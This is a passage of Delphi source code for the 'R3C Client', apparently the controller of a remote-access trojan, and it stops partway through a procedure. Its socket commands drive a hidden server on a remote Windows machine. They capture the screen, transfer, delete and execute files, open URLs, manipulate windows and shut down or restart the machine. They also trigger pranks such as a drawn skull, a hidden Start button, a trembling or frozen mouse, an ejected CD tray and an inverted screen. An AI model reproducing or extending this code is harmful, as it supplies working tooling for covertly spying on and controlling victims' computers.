unit client_main;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls, ScktComp, ComCtrls, ImgList,zutil,zuncompr, ExtCtrls, winsock;

type
  TForm1 = class(TForm)
    Client: TClientSocket;
    ComboBox1: TComboBox;
    Button2: TButton;
    Status: TStatusBar;
    GroupBox1: TGroupBox;
    Button3: TButton;
    GroupBox2: TGroupBox;
    ListBox1: TListBox;
    Button6: TButton;
    Button7: TButton;
    Button8: TButton;
    Edit2: TEdit;
    Button10: TButton;
    Button13: TButton;
    Button14: TButton;
    GroupBox3: TGroupBox;
    Button1: TButton;
    Button16: TButton;
    Button17: TButton;
    Button18: TButton;
    Edit3: TEdit;
    ListView1: TListView;
    ImageList1: TImageList;
    GroupBox4: TGroupBox;
    Button19: TButton;
    Button20: TButton;
    Button9: TButton;
    Edit1: TEdit;
    Label1: TLabel;
    Label2: TLabel;
    Button21: TButton;
    Button22: TButton;
    Button12: TButton;
    Panel1: TPanel;
    ComboBox2: TComboBox;
    Button30: TButton;
    aboutbtn: TButton;
    Button4: TButton;
    GroupBox5: TGroupBox;
    Button5: TButton;
    Edit4: TEdit;
    Label3: TLabel;
    Edit5: TEdit;
    Button15: TButton;
    Button23: TButton;
    Button24: TButton;
    Button25: TButton;
    Button26: TButton;
    Button11: TButton;
    Button27: TButton;
    Button28: TButton;
    Button29: TButton;
    Button31: TButton;
    Button32: TButton;
    Label4: TLabel;
    procedure Button2Click(Sender: TObject);
    procedure Button1Click(Sender: TObject);
    procedure ClientConnecting(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientConnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientDisconnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure Button3Click(Sender: TObject);
    procedure ComboBox1Change(Sender: TObject);
    procedure dopricolnr2(Sender: TObject);
    procedure dodrawskull(Sender: TObject);
    procedure Button13Click(Sender: TObject);
    procedure Button14Click(Sender: TObject);
    procedure Button12Click(Sender: TObject);
    procedure Button9Click(Sender: TObject);
    procedure Button6Click(Sender: TObject);
    procedure Button8Click(Sender: TObject);
    procedure Button7Click(Sender: TObject);
{    procedure Button11Click(Sender: TObject);}
    procedure Button10Click(Sender: TObject);
    procedure Button16Click(Sender: TObject);
    procedure ListView1SelectItem(Sender: TObject; Item: TListItem;
      Selected: Boolean);
    procedure ListView1DblClick(Sender: TObject);
    procedure dopricolnr3(Sender: TObject);
    function wait_n_receive:string;
    procedure Button19Click(Sender: TObject);
    procedure Button20Click(Sender: TObject);
    procedure Button18Click(Sender: TObject);
    procedure Button17Click(Sender: TObject);
    procedure Button11Click(Sender: TObject);
    procedure Button21Click(Sender: TObject);
    procedure Button22Click(Sender: TObject);
    procedure Edit1KeyPress(Sender: TObject; var Key: Char);
    procedure disablecontrols;
    procedure FormCreate(Sender: TObject);
    procedure ClientError(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure FormDestroy(Sender: TObject);
    procedure dopricolnr4(Sender: TObject);
    procedure aboutbtnClick(Sender: TObject);
    procedure Button30Click(Sender: TObject);
    procedure turnupsidedown;
    procedure Button4Click(Sender: TObject);
    procedure Button23Click(Sender: TObject);
    procedure Button24Click(Sender: TObject);
    procedure Button25Click(Sender: TObject);
    procedure FormShow(Sender: TObject);
    procedure Button26Click(Sender: TObject);
    procedure Button5Click(Sender: TObject);
    procedure Button15Click(Sender: TObject);
    procedure Button27Click(Sender: TObject);
    procedure Button28Click(Sender: TObject);
    procedure Button29Click(Sender: TObject);
    procedure Button31Click(Sender: TObject);
    procedure Button32Click(Sender: TObject);
    procedure ListBox1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  textresult,textarg:array[0..255] of char;
  wins:array[0..300]of hwnd;
  wcnt:integer;
  defdialog:string;
  sizes:array[0..1000]of longint;
  currentdir:string='c:\';
  curseldir:boolean;
  unconnected:boolean=true;
  cancel:boolean=false;
  captscriscaller:boolean=false;
{  scanipactive:boolean=false;}
{  bits:array of byte;}

implementation

uses client_img, messfunc,poledit, control, about, scanip;
{$R *.DFM}
{$R dialogc.res}

type pcardinal=^cardinal;

{$L minilzo.obj}
function lzo1x_1_compress(const src:pointer; src_len:cardinal;
                                dst:pointer; dst_len:pcardinal;
                                wrkmem:pointer):cardinal;pascal;external;
function lzo1x_decompress(const src:pointer; src_len:word;
                                dst:pointer; dst_len:pcardinal;
                                wrkmem:pointer):cardinal;pascal;external;

var connecting:boolean=false;

procedure tform1.disablecontrols;
begin
{  if panel1.top=300 then panel1.top:=27 else panel1.top:=300;}
  if unconnected then panel1.Visible:=true else panel1.Visible:=false;
{  button11.enabled:=not button11.enabled;}
end;

procedure enablecancel(txt:string);
begin
  form1.button32.caption:='Cancel '+txt;
  form1.button32.visible:=true;
  form1.panel1.Visible:=true;
end;

procedure disablecancel;
begin
  form1.button32.visible:=false;
  form1.panel1.Visible:=false;
end;

function receivefile(destfn:string;fs:longint):boolean;
var cnt:longint;
    f:file;
    buf:array[0..8192]of char;
    temp,numwritten:integer;
    tmp:cardinal;
label exitproc;
begin
  {$I-}
  assignfile(f,destfn);
  rewrite(f,1);
  if ioresult<>0 then begin form1.status.panels[1].text:='Error!';   form1.client.socket.sendtext('e!'#13); goto exitproc; end;
  form1.status.panels[1].text:='Saving: 0%';
  form1.client.socket.sendtext('c!'#13); cnt:=0;
  repeat
    temp:=0;
    tmp:=gettickcount;
    repeat
      Application.ProcessMessages;
      numwritten:=form1.client.socket.receivelength;
      form1.client.socket.ReceiveBuf(buf,numwritten);
      blockwrite(f,buf,numwritten);
      if ioresult<>0 then begin form1.status.panels[1].text:='Error!'; closefile(f); form1.client.socket.sendtext('e!'#13); result:=false; goto exitproc; end;
      temp:=temp+numwritten;
      if unconnected then exit;
      if tmp+20000<=gettickcount then begin
        messagedlg('Server is not answering, try to Reconnect.',mterror,[mbok],0);
        form1.client.socket.close;
        result:=false; exit;
      end;
    until (temp>=8192)or(temp>=fs-cnt);
    if cancel then goto exitproc else
      form1.client.socket.sendtext('n!'#13);
    cnt:=cnt+temp;
    form1.status.panels[1].text:='Saving: '+inttostr(100*cnt div fs)+'%  ('+inttostr(cnt)+'/'+inttostr(fs)+')';
  until cnt>=fs;
  form1.client.socket.sendtext('n!'#13);
  closefile(f);
  form1.status.panels[1].text:='Saved to '+destfn+' ('+inttostr(fs div 1024)+'k)';
  result:=true;
  {-$I+}
exitproc:
  cancel:=false;
  disablecancel;
end;

function textdialogproc(dlg:hwnd;mess:word;wpr,lpr:longint):longbool;stdcall;
begin
{  textdialogproc:=true;}
  case mess of
    WM_INITDIALOG: begin
      setwindowtext(dlg,textresult); setdlgitemtext(dlg,110,textarg);
      setdlgitemtext(dlg,101,pchar(defdialog));
    end;
    WM_COMMAND: case wpr of
      1: begin {OK}
        getdlgitemtext(dlg,101,textresult,250);
        enddialog(dlg,0);
      end;
      2: {cancel}begin textresult:=''; enddialog(dlg,0); end;
    end;
  end;
  textdialogproc:=false;
end;

{function gettempfn(ext:string):string;
var i:integer;
begin
  for i:=1 to 100 do begin
    result:='temp'+inttostr(i)+'.'+ext;
    if not fileexists(result) then exit;
  end;
end;}

function askstring(capt,msg:string):string;
var i:integer;
begin
  for i:=0 to length(capt)-1 do textresult[i]:=capt[i+1]; textresult[length(capt)]:=#0;
  for i:=0 to length(msg)-1 do textarg[i]:=msg[i+1]; textarg[length(msg)]:=#0;
  windows.dialogbox(getmodulehandle(nil),'TEXTDIALOG',form1.handle,@textdialogproc);
  result:=textresult;
end;

function TForm1.wait_n_receive:string;
var str,res:string;
    tmp,tc:cardinal;
    delay:cardinal;
label z;
begin
  if captscriscaller then begin delay:=180000; captscriscaller:=false; end else delay:=10000;
  tmp:=gettickcount;
  res:='';
  repeat
z:
    str:=form1.client.socket.ReceiveText;
    application.ProcessMessages;
    tc:=gettickcount;
    if unconnected then exit;
    if cancel then begin {cancel:=false;} exit; end;
    if tmp+delay<=tc then begin
      messagedlg('Server is not answering, try to Reconnect.',mterror,[mbok],0);
      client.Socket.Close;
      result:=''; exit;
    end;
{    if (str<>'') then if str<>#0 then break;}
    res:=res+str;
    if res='' then goto z;
  until res[length(res)]=#13;
  setlength(res,length(res)-1);
  result:=res;
end;

{function strtoip(ip:string):cardinal;
var i,j:integer;
    tmp:array[1..4]of byte;
    tmp2:cardinal absolute tmp;
begin
  i:=pos('.',ip);
  tmp[4]:=strtoint(copy(ip,1,i-1)); ip[i]:='X'; j:=i+1;
  i:=pos('.',ip);
  tmp[3]:=strtoint(copy(ip,j,i-j)); ip[i]:='X'; j:=i+1;
  i:=pos('.',ip);
  tmp[2]:=strtoint(copy(ip,j,i-j)); ip[i]:='X'; j:=i+1;
  tmp[1]:=strtoint(copy(ip,j,length(ip)+1-j));
  result:=tmp2;
end;}

procedure TForm1.Button2Click(Sender: TObject);
var i,d:integer;
    addr:boolean;
begin
  if unconnected then panel1.visible:=true else panel1.visible:=false;
  client.Port:=strtoint(edit1.text);
  if client.socket.connected=false then begin
    d:=0; addr:=true;
    for i:=1 to length(combobox1.text) do begin
      if combobox1.text[i]='.' then begin
        d:=d+1; continue;
      end;
      if not (combobox1.text[i] in ['0'..'9']) then begin
        addr:=false; break;
      end;
    end;
    if (d=3)and(addr) then begin
      client.address:=combobox1.text
    end else begin
      if gethostbyname(pchar(combobox1.text))=nil then begin messagedlg('No such hostname!',mterror,[mbok],0); exit; end;
      client.host:=combobox1.text;
    end;
    client.open;
    enablecancel('connect');
    connecting:=true;
  end else client.socket.Close;
end;

procedure TForm1.Button1Click(Sender: TObject);
var str,cmd,param:string;
    i:integer;
    fs:longint;
label exitproc;
begin
  defdialog:=edit3.text;
  str:=askstring('Download','Enter filename to download');
  if str='' then exit;
  client.Socket.SendText('download?'+str+#13);
  enablecancel('Download');
  str:=wait_n_receive;
  if str='error' then begin messagebox(form1.handle,'Error'#10'File not exist?','Server Error',MB_OK or MB_ICONHAND); goto exitproc; end;
  i:=pos('?',str);
  cmd:=copy(str,0,i-1);
  param:=copy(str,i+1,length(str)-i);
  if cmd='sending' then begin
    fs:=strtoint(param); defdialog:='';
    str:=askstring('Downloading file','Enter destination filename');
    receivefile(str,fs);
  end;
exitproc:
  cancel:=false;
  disablecancel;
end;

procedure TForm1.ClientConnecting(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  status.Panels[0].text:='Connecting to '+combobox1.text+'...';
end;

procedure TForm1.ClientConnect(Sender: TObject; Socket: TCustomWinSocket);
var str:string;
    i:integer;
    tmp:boolean;
begin
  unconnected:=false;
  combobox1.enabled:=false;
  edit1.enabled:=false;
  str:=wait_n_receive;
  status.Panels[0].text:='Connected to '+combobox1.text+'.';
  status.Panels[0].text:=status.Panels[0].text+' R3C '+str;
  button2.caption:='Disconnect';
  tmp:=false;
  for i:=0 to combobox1.items.Count-1 do if lowercase(combobox1.text)=combobox1.items.strings[i] then tmp:=true;
  if tmp=false then combobox1.items.add(lowercase(combobox1.text));
  //disablecontrols;
  connecting:=false;
  disablecancel;
end;

procedure TForm1.ClientDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  unconnected:=true;
  status.Panels[0].text:='Disconnected.';
  combobox1.enabled:=true;
  edit1.enabled:=true;
  button2.caption:='Connect!';
  disablecontrols;
end;

function wp(wnd:hwnd;mess:word;wpr:wparam;lpr:lparam):longint;stdcall;
begin
{  wp:=0;}
  if mess=WM_LBUTTONDOWN then destroywindow(wnd);
  wp:=defwindowproc(wnd,mess,wpr,lpr);
end;

procedure TForm1.Button3Click(Sender: TObject);
type aob=array [0..10000000] of byte;
var str:string;
    i:integer;
    fs:longint;
    iw,ih:integer;
    bi:tagbitmapinfo;
    bits:pointer;
    src:^aob;
    numwritten,temp:integer;
    cnt:longint;
    destlen:longint;
    f:file;
    tmp:cardinal;
    opt:byte;
label exitproc;
begin
  enablecancel('Capturing');
  status.panels[1].text:='Server is capturing... Be patient';
  client.socket.SendText('screen?'#13);
  {captscriscaller:=true;}
  str:=wait_n_receive;
  if str='' then begin
    goto exitproc;
  end;
  i:=pos('x',str);
  iw:=strtoint(copy(str,0,i-1)); ih:=strtoint(copy(str,i+1,length(str)-i));
  client.socket.SendText('n!'#13);
  captscriscaller:=true; str:=wait_n_receive;
  if str='' then begin
    goto exitproc;
  end;
  i:=pos('?',str);
  if copy(str,0,i-1)='sending' then begin
    if str[i+2]='.' then begin
      opt:=byte(str[i+1])-48; i:=i+2;
    end else begin
      // support for old versions below 1.15
      opt:=1; // 1=nonzero
    end;
    fs:=strtoint(copy(str,i+1,length(str)-i));
    getmem(src,fs+100);
    form1.status.panels[1].text:='0%';
    form1.client.socket.sendtext('c!'#13); cnt:=0;
    repeat
      temp:=0;
      tmp:=gettickcount;
      repeat
        Application.ProcessMessages;
        numwritten:=form1.client.socket.receivelength;
        form1.client.socket.ReceiveBuf(pointer(longint(src)+cnt)^,numwritten);
        temp:=temp+numwritten;
        if unconnected then exit;
        if tmp+20000<=gettickcount then begin
          messagedlg('Server is not answering, try to Reconnect.',mterror,[mbok],0);
          client.Socket.Close;
          exit;
        end;
      until (temp>=8192)or(temp>=fs-cnt);
      if cancel then begin
        goto exitproc;
      end else
        form1.client.socket.sendtext('n!'#13);
      cnt:=cnt+temp;
      form1.status.panels[1].text:=inttostr(100*cnt div fs)+'%  ('+inttostr(cnt)+'/'+inttostr(fs)+')';
    until cnt>=fs;
    form1.client.socket.sendtext('n!'#13);
  end else begin
    status.panels[1].text:='Error happened';
    goto exitproc;
  end;
  status.panels[1].text:='Ready!';

  disablecancel;

  destlen:=iw*ih*3;
  getmem(bits,destlen+1000);

  if opt=0 then begin
    lzo1x_decompress(src,fs,bits,@destlen,nil);
  end else
    uncompress(bits,destlen,src^,fs);

//  assignfile(f,'lastpic.gz'); rewrite(f,1);
//  blockwrite(f,src^,fs); closefile(f);

//  assignfile(f,'lastpic.tmp'); rewrite(f,1);
//  blockwrite(f,bits^,destlen); closefile(f);

  freemem(src);
  form2.Height:=screen.height; form2.width:=screen.width;
  form2.top:=0; form2.left:=0;
  form2.show;
  bi.bmiHeader.biSize:=sizeof(tbitmapinfoheader);
  bi.bmiHeader.biWidth:=iw;
  bi.bmiHeader.biHeight:=ih;
  bi.bmiHeader.biPlanes:=1;
  bi.bmiHeader.biBitCount:=24;
  bi.bmiHeader.biCompression:=BI_RGB;
  bi.bmiHeader.biSizeImage:=0;
  bi.bmiHeader.biClrUsed:=0;
  bi.bmiHeader.biClrImportant:=0;
  stretchdibits(getwindowdc(getdesktopwindow),0,0,iw,ih,0,0,screen.width,screen.height,bits,bi,DIB_RGB_COLORS,SrcCopy);
  freemem(bits);

exitproc:
  form1.client.socket.sendtext('e!'#13);
  disablecancel;
  cancel:=false;
end;

procedure TForm1.ComboBox1Change(Sender: TObject);
begin
  button2.enabled:=(combobox1.text<>'');
end;

procedure TForm1.dopricolnr2(Sender: TObject);
var s:string;
begin
  client.socket.SendText('startbtn?'#13);
  s:=wait_n_receive;
  if s='H' then status.Panels[1].text:='Start Button Hidden' else status.Panels[1].text:='Start Button Visible';
end;

procedure TForm1.dodrawskull(Sender: TObject);
begin
  client.socket.SendText('pricol?'#13);
  if wait_n_receive='OK' then status.panels[1].text:='Pricol: OK'
  else status.panels[1].text:='Error';
end;

procedure TForm1.Button13Click(Sender: TObject);
begin
  client.socket.sendtext('shutdown?'#13);
end;

procedure TForm1.Button14Click(Sender: TObject);
begin
  client.socket.sendtext('restart?'#13);
end;

procedure TForm1.Button12Click(Sender: TObject);
var str,s2:string;
begin
  defdialog:=edit3.text;
  str:=askstring('Rename','Enter new name');
  s2:=edit3.text;
  if s2[length(s2)]='\' then setlength(s2,length(s2)-1);
  client.socket.sendtext('rename?'+s2+'?'+str+#13);
  str:=wait_n_receive;
  edit3.text:=currentdir+'\';
  if str='OK' then status.Panels[1].text:='Renamed.' else status.Panels[1].text:='Error!';
end;

procedure TForm1.Button9Click(Sender: TObject);
var s2:string;
begin
  s2:=edit3.text; if s2[length(s2)]='\' then setlength(s2,length(s2)-1);
  client.Socket.sendtext('delete?'+s2+#13);
  if wait_n_receive='OK' then status.panels[1].text:=s2+' deleted.';
  edit3.text:=currentdir;
end;

procedure TForm1.Button6Click(Sender: TObject);
var str:string;
    i,j:integer;
    name:string;
    hand:hwnd;
label repbeg;
begin
  client.socket.sendtext('windows?'#13);
  listbox1.Items.Clear;
  wcnt:=0;
  str:=wait_n_receive;
  if str='' then exit;
  repeat
repbeg:
    i:=pos(#1,str);
    j:=pos(#2,str);
    if unconnected then exit;
    if j=0 then begin
      if str='OK' then break else begin str:=str+wait_n_receive; goto repbeg; end;
    end;
    name:=copy(str,1,i-1);
    hand:=strtoint(copy(str,i+1,j-i-1));
    delete(str,1,j);
    listbox1.Items.Add(name);
    wins[wcnt]:=hand;
    wcnt:=wcnt+1;
  until false;
  client.Socket.SendText('OK'#13);
end;

procedure TForm1.Button8Click(Sender: TObject);
var i,j:integer;
begin
  j:=maxint;
  for i:=0 to listbox1.Items.Count-1 do begin
    if listbox1.selected[i] then begin
      client.socket.sendtext('closewin?'+inttostr(wins[i])+#13);
      j:=i; break;
    end;
  end;
  if j>listbox1.items.count then begin button6.onclick(self); status.panels[1].text:='Select window first'; exit; end;
  wait_n_receive;
  status.panels[1].text:='Closed: '+listbox1.Items.Strings[j];
end;

procedure TForm1.Button7Click(Sender: TObject);
var i,j:integer;
begin
  j:=maxint;
  for i:=0 to listbox1.Items.Count-1 do begin
    if listbox1.selected[i] then begin
      client.socket.sendtext('focus?'+inttostr(wins[i])+#13);
      j:=i; break;
    end;
  end;
  if j>listbox1.items.count then begin button6.onclick(self); status.panels[1].text:='Select window first'; exit; end;
  wait_n_receive;
  status.panels[1].text:='Focused: '+listbox1.Items.Strings[j];
end;

{procedure TForm1.Button11Click(Sender: TObject);
var i,j:integer;
begin
  for i:=0 to listbox1.Items.Count-1 do begin
    if listbox1.selected[i] then begin
      client.socket.sendtext('hole?'+inttostr(wins[i])+#13);
      j:=i; break;
    end;
  end;
  wait_n_receive;
  status.panels[1].text:='Hole is made: '+listbox1.Items.Names[j];
end;}

procedure TForm1.Button10Click(Sender: TObject);
var i,j:integer;
begin
  j:=maxint;
  for i:=0 to listbox1.Items.Count-1 do begin
    if listbox1.selected[i] then begin
      client.socket.sendtext('caption?'+inttostr(wins[i])+#1+edit2.text+#13);
      j:=i;
      break;
    end;
  end;
  if j>listbox1.items.count then begin button6.onclick(self); status.panels[1].text:='Select window first'; exit; end;
  wait_n_receive;
  status.panels[1].text:='OK';
end;

procedure TForm1.Button16Click(Sender: TObject);
var s,ss:string;
    i:integer;
label begrep,back;
begin
  client.socket.receivebuf(s,client.socket.receivelength);
  for i:=length(edit3.text) downto 1 do begin
    if edit3.text[i]='\' then begin
      s:=edit3.text;
      delete(s,i+1,length(s)-i);
      edit3.text:=s;
      break;
    end;
  end;
  listview1.Enabled:=false;
  listview1.Items.Clear;
back:
  client.Socket.SendText('cd?'+edit3.text+#13);
  s:=wait_n_receive;
{  if (s[1]='e')and(s[5]='r') then goto back;}
  i:=pos(#1,s);
  currentdir:=copy(s,1,i-1);
  delete(s,1,i);
  repeat
begrep:
    i:=pos(#1,s);
    if i=0 then begin
      if s='OK' then break else begin
        if s='error' then status.panels[1].text:='Error happened...' else begin s:=s+wait_n_receive; goto begrep; end;
      end;
    end;
    ss:=copy(s,1,i-1);
    delete(s,1,i);
    if ss='' then begin button16click(self); exit; end;
    listview1.Items.Add;
    if ss[1]='1' then listview1.items.Item[listview1.items.count-1].imageindex:=1;
    i:=pos('?',ss);
    sizes[listview1.items.count-1]:=strtoint(copy(ss,2,i-2));
    listview1.items.Item[listview1.items.count-1].caption:=copy(ss,i+1,length(ss)-i);
  until false;
  client.socket.sendtext('OK'#13);
{  currentdir:=wait_n_receive;
  client.socket.sendtext('GO'#13);
  edit3.text:=currentdir;
  listview1.Items.Clear;
  repeat
    s:=wait_n_receive;
    if s='OK' then break else
    if s='error' then begin messagebox(0,'Server returned error!','ERROR',MB_OK or MB_ICONSTOP); break; end;
    listview1.Items.Add;
    i:=pos('?',s);
    if s[1]='1' then listview1.items.Item[listview1.items.count-1].imageindex:=1;
    listview1.items.Item[listview1.items.count-1].caption:=copy(s,2,i-2);
    sizes[listview1.items.count-1]:=strtoint(copy(s,i+1,length(s)-i));
    client.socket.sendtext('n'#13);
  until 5=8;}
  listview1.Enabled:=true;
end;

procedure TForm1.ListView1SelectItem(Sender: TObject; Item: TListItem;
  Selected: Boolean);
var tmp:integer;
    tmp2:string;
begin
  tmp2:=currentdir+'\'+item.caption;
  tmp:=pos('\\',tmp2);
  if tmp>0 then delete(tmp2,tmp,1);
  if item.ImageIndex=1 then tmp2:=tmp2+'\';
  edit3.text:=tmp2;
  if item.ImageIndex=1 then curseldir:=true else curseldir:=false;
  status.Panels[1].text:=inttostr(sizes[item.index])+' bytes';
end;

procedure TForm1.ListView1DblClick(Sender: TObject);
begin
  if curseldir then button16.click else button1.click;
end;

procedure TForm1.dopricolnr3(Sender: TObject);
var s:string;
begin
  client.socket.SendText('tremble?'#13);
  s:=wait_n_receive;
  if s='ON' then status.panels[1].text:='Mouse Trembling Activated' else status.panels[1].text:='Mouse Trembling Deactivated';
end;

procedure TForm1.Button19Click(Sender: TObject);
begin
  form3.Visible:=true;
end;

procedure TForm1.Button20Click(Sender: TObject);
begin
  form4.show;
end;

procedure TForm1.Button18Click(Sender: TObject);
var str:string;
begin
  defdialog:=edit3.text;
  str:=askstring('Create directory','Enter directory name');
  if str='' then exit;
  client.Socket.SendText('createdir?'+str+#13);
  str:=wait_n_receive;
  if str='OK' then status.Panels[1].text:='OK!' else status.Panels[1].text:='Error!';
end;

procedure TForm1.Button17Click(Sender: TObject);
var f:file;
    buf:array[0..15000]of char;
    fs,cnt:longint;
    numread:integer;
    s,str:string;
begin
  defdialog:='';
  str:=askstring('Upload','Enter filename to upload (from local machine)');
  if str='' then exit;
  assignfile(f,str);
  reset(f,1);
  if ioresult<>0 then begin status.panels[1].text:='Error!'; exit; end;
  defdialog:=edit3.text;
  str:=askstring('Upload','Enter destination filename (on the remote machine)');
  if str='' then exit;
  fs:=filesize(f);
  s:='upload?'+inttostr(fs)+'?'+str;
  client.socket.sendtext(s+#13);
  if wait_n_receive<>'n!' then begin closefile(f); exit; end;
  cnt:=0;
  repeat
    if unconnected then exit;
    blockread(f,buf,15000,numread);
    client.socket.sendbuf(buf,numread);
    cnt:=cnt+numread;
    if wait_n_receive<>'n!' then begin closefile(f); exit; end;
  until cnt>=fs;
  status.panels[1].text:='File uploaded';
  closefile(f);
end;

procedure TForm1.Button11Click(Sender: TObject);
var str:string;
begin
  client.socket.sendtext('info?'#13);
  str:=wait_n_receive;
  messagebox(0,pchar(str),'Server Info',MB_OK or MB_ICONINFORMATION);
end;

procedure TForm1.Button21Click(Sender: TObject);
var st:string;
begin
  defdialog:=edit3.text;
  st:=askstring('Execute Program/File','Enter file name with full path:');
  if st='' then exit;
  client.socket.SendText('execute?'+st+#13);
end;

procedure TForm1.Button22Click(Sender: TObject);
var st:string;
begin
  defdialog:='';
  st:=askstring('Open browser with URL','Enter URL:');
  if st='' then exit;
  client.socket.SendText('URL?'+st+#13);
end;

procedure TForm1.Edit1KeyPress(Sender: TObject; var Key: Char);
begin
  if key=#8 then exit;
  if (not (key in ['0'..'9']))or(length(edit1.text)=5) then key:=#0;
end;

procedure TForm1.FormCreate(Sender: TObject);
var f:system.text;
    tmp:string;
begin
  {disablecontrols;}
  panel1.top:=combobox1.height+combobox1.top+3;
  panel1.height:=status.Top-panel1.top;
  panel1.visible:=true;

  button32.visible:=false;
  button32.top:=combobox1.top;
  button32.left:=label1.left;
  button32.height:=combobox1.height;
  button32.width:=button2.width+button2.left-label1.left;

  combobox2.ItemIndex:=0;

  {$I-}
  assignfile(f,'r3chosts.dat');
  reset(f);
  if ioresult<>0 then exit;
  repeat
    readln(f,tmp);
    combobox1.items.add(tmp);
  until eof(f);
  closefile(f);
  {$I+}
end;

procedure TForm1.ClientError(Sender: TObject; Socket: TCustomWinSocket;
  ErrorEvent: TErrorEvent; var ErrorCode: Integer);
begin
  if cancel then begin cancel:=false; errorcode:=0; exit; end;
  cancel:=false;
  if errorcode=10054 then begin
    messagedlg('Served closed connection.',mtinformation,[mbok],0); disablecancel;
  end else if (errorcode=10061)or(errorcode=10049) then begin
    disablecancel;
    messagedlg('Failed to connect, server is not running on the specified computer!',mterror,[mbok],0)
  end else
    messagedlg('Socket error '+inttostr(errorcode),mtinformation,[mbok],0);
  errorcode:=0;
  if not panel1.visible then ClientDisconnect(self,socket)
  else status.panels[0].text:='Failed';
end;

procedure TForm1.FormDestroy(Sender: TObject);
var f:system.text;
    i:integer;
begin
  assignfile(f,'r3chosts.dat');
  rewrite(f);
  for i:=1 to combobox1.Items.count-1 do begin
    writeln(f,combobox1.items.strings[i]);
  end;
  closefile(f);
end;

procedure TForm1.dopricolnr4(Sender: TObject);
begin
  client.socket.sendtext('opencd?'#13);
end;

procedure closecdrom;
begin
  form1.client.socket.sendtext('closecd?'#13);
end;

procedure TForm1.aboutbtnClick(Sender: TObject);
begin
  {messagedlg('R3C Client v1.2'#13#10'Written by Angryziber'#13#10'http://r3c.cjb.net'#13#10'http://angryziber.cjb.net',mtInformation,[mbOk],0);}
{  form6.Top:=-form6.Height;}
  form6.show;
end;

procedure tform1.turnupsidedown;
begin
  client.Socket.SendText('upsidedown?'#13);
end;

procedure TForm1.Button30Click(Sender: TObject);
begin
  case combobox2.ItemIndex of
    0: dodrawskull(self);
    1: dopricolnr2(self);
    2: dopricolnr3(self);
    3: dopricolnr4(self);
    4: closecdrom;
    5: turnupsidedown;
  end;
end;

procedure TForm1.Button4Click(Sender: TObject);
var fn:string;
begin
  defdialog:='c:\windows\logos.sys';
  fn:=askstring('Display BMP','Enter filename with path to display:');
  if fn='' then exit;
  client.socket.sendtext('dispbmp?'+fn+#13);
  fn:=wait_n_receive;
  if fn='OK' then status.Panels[1].text:='Success'
  else messagedlg('Wrong filename or invalid bitmap!',mterror,[mbok],0);
end;

procedure TForm1.Button23Click(Sender: TObject);
var i,j:integer;
begin
  j:=maxint;
  for i:=0 to listbox1.Items.Count-1 do begin
    if listbox1.selected[i] then begin
      client.socket.sendtext('makewsmall?'+inttostr(wins[i])+#13);
      j:=i; break;
    end;
  end;
  if j>listbox1.items.count then begin button6.onclick(self); status.panels[1].text:='Select window first'; exit; end;
  wait_n_receive;
  status.panels[1].text:='Made small: '+listbox1.Items.Strings[j];
end;

procedure TForm1.Button24Click(Sender: TObject);
var i,j:integer;
begin
  j:=maxint;
  for i:=0 to listbox1.Items.Count-1 do begin
    if listbox1.selected[i] then begin
      client.socket.sendtext('topmost?'+inttostr(wins[i])+#13);
      j:=i; break;
    end;
  end;
  if j>listbox1.items.count then begin button6.onclick(self); status.panels[1].text:='Select window first'; exit; end;
  wait_n_receive;
  status.panels[1].text:='Made Topmost: '+listbox1.Items.Strings[j];
end;

procedure TForm1.Button25Click(Sender: TObject);
type  xxx=record x,y,w,h:smallint end;
      pxxx=^xxx;
var i,j:integer;
    str:string;
    info:pxxx;
begin
  j:=maxint;
  for i:=0 to listbox1.Items.Count-1 do begin
    if listbox1.selected[i] then begin
      client.socket.sendtext('controlwin?'+inttostr(wins[i])+#13);
      j:=i; break;
    end;
  end;
  if j>listbox1.items.count then begin button6.onclick(self); status.panels[1].text:='Select window first'; exit; end;
  form5.caption:=listbox1.Items.Strings[j];
  str:=wait_n_receive;
  if (copy(str,1,2)<>'OK')or(length(str)<>10) then begin
    messagedlg('Error, try to Refresh window list.',mterror,[mbok],0);
    exit;
  end;
  delete(str,1,2);
  info:=@str[1];
  form5.top:=info.y; form5.left:=info.x;
  form5.Width:=info.w; form5.Height:=info.h;
  form5.x:=info.x; form5.y:=info.y;
  form5.w:=info.w; form5.h:=info.h;
  form5.Timer1.OnTimer:=form5.Timer1Timer;
  form5.showmodal;
end;

procedure TForm1.FormShow(Sender: TObject);
begin
  form6.Hide;
end;

procedure TForm1.Button26Click(Sender: TObject);
var tmp:string[5];
begin
  if messagedlg('Are you sure, you want to remove R3C server from the remote computer?'#10+
       '(You will not be able to connect to it after that)',mtconfirmation,[mbYes,mbNo],0)=mrYes then begin
    if messagedlg('Are you really, really sure? If you''re unsure / don''t know, what are you doing, Press NO!',mtconfirmation,[mbYes,mbNo],0)=mrYes then begin
      if messagedlg('Final warning: You will LOSE all the POWER!!!'#10'If you still want to, Press OK to remove server.',mtconfirmation,[mbOk,mbCancel],0)=mrOk then begin
        {Remove server...}
        client.socket.SendText('killyourself?'#13);
        tmp:=wait_n_receive;
        if tmp='DEAD' then begin
          status.panels[1].text:='SERVER IS DEAD';
        end;
      end;
    end;
  end;
end;

procedure TForm1.Button5Click(Sender: TObject);
begin
  client.socket.sendtext('setmpos?'+edit4.text+'.'+edit5.text+#13);
  wait_n_receive;
  status.panels[1].text:='OK!';
end;

procedure TForm1.Button15Click(Sender: TObject);
var tmp:string[5];
begin
  client.socket.sendtext('freezempos?'#13);
  tmp:=wait_n_receive;
  if tmp='ST' then status.panels[1].text:='Mouse Freezed' else
    status.panels[1].text:='Mouse Unfreezed';
end;

procedure TForm1.Button27Click(Sender: TObject);
begin
  client.socket.sendtext('cls?'#13);
  wait_n_receive;
  status.panels[1].text:='Screen sucessfully redrawed';
end;

procedure TForm1.Button28Click(Sender: TObject);
begin
  aboutbtn.SetFocus;
  application.Minimize;
end;

procedure TForm1.Button29Click(Sender: TObject);
begin
  if unconnected=false then begin
    messagedlg('You must disconnect first!',mterror,[mbok],0);
    exit;
  end;
